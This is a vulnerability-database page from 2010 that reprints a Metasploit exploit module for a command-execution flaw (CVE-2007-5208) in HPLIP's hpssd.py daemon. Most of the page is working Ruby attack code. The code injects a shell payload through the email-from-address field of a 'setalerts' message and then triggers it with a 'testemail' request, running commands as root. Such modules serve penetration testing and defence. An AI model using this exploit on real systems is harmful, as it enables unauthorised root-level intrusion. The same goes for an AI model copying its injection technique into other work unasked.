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hplip hpssd.py From Address Arbitrary Command Execution

🗓️ 17 Feb 2010 00:00:00Reported by jduckType 
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hplip hpssd.py Arbitrary Command Execution Vulnerability in Hewlett-Packard Linux Imaging and Printing Project

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`##  
# $Id: hplip_hpssd_exec.rb 8511 2010-02-16 00:27:45Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'hplip hpssd.py From Address Arbitrary Command Execution',  
'Description' => %q{  
This module exploits a command execution vulnerable in the hpssd.py  
daemon of the Hewlett-Packard Linux Imaging and Printing Project.  
According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.  
  
This module was written and tested using the Fedora 6 Linux distribution.  
On the test system, the daemon listens on localhost only and runs with  
root privileges. Although the configuration shows the daemon is to  
listen on port 2207, it actually listens on a dynamic port.  
  
NOTE: If the target system does not have a 'sendmail' command installed,  
this vulnerability cannot be exploited.  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8511 $',  
'References' =>  
[  
[ 'CVE', '2007-5208' ],  
[ 'OSVDB', '41693' ],  
[ 'BID', '26054' ],  
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=319921' ],  
[ 'URL', 'https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit' ]  
],  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
# *_perl and *_ruby work if they are installed  
# inetd isn't used on FC6/7 (xinetd is)  
# netcat doesn't have -e by default  
}  
},  
'Targets' =>  
[  
[ 'Automatic (hplip-1.6.7-4.i386.rpm)', { } ]  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(2207),  
], self.class)  
end  
  
def exploit  
  
connect  
  
#cmd = "nohup " + payload.encoded  
cmd = payload.encoded  
  
username = 'root'  
toaddr = 'nosuchuser'  
  
# first setalerts  
print_status("Sending 'setalerts' request with encoded command line...")  
msg = "username=#{username}\n" +  
"email-alerts=1\n" +  
#"email-from-address=`#{cmd}`\n" +  
"email-from-address=x;#{cmd};\n" +  
"email-to-addresses=#{toaddr}\n" +  
"msg=setalerts\n"  
sock.put(msg)  
  
# next, the test email command  
print_status("Sending 'testemail' request to trigger execution...")  
msg = "msg=testemail\n"  
sock.put(msg)  
  
end  
  
end  
`

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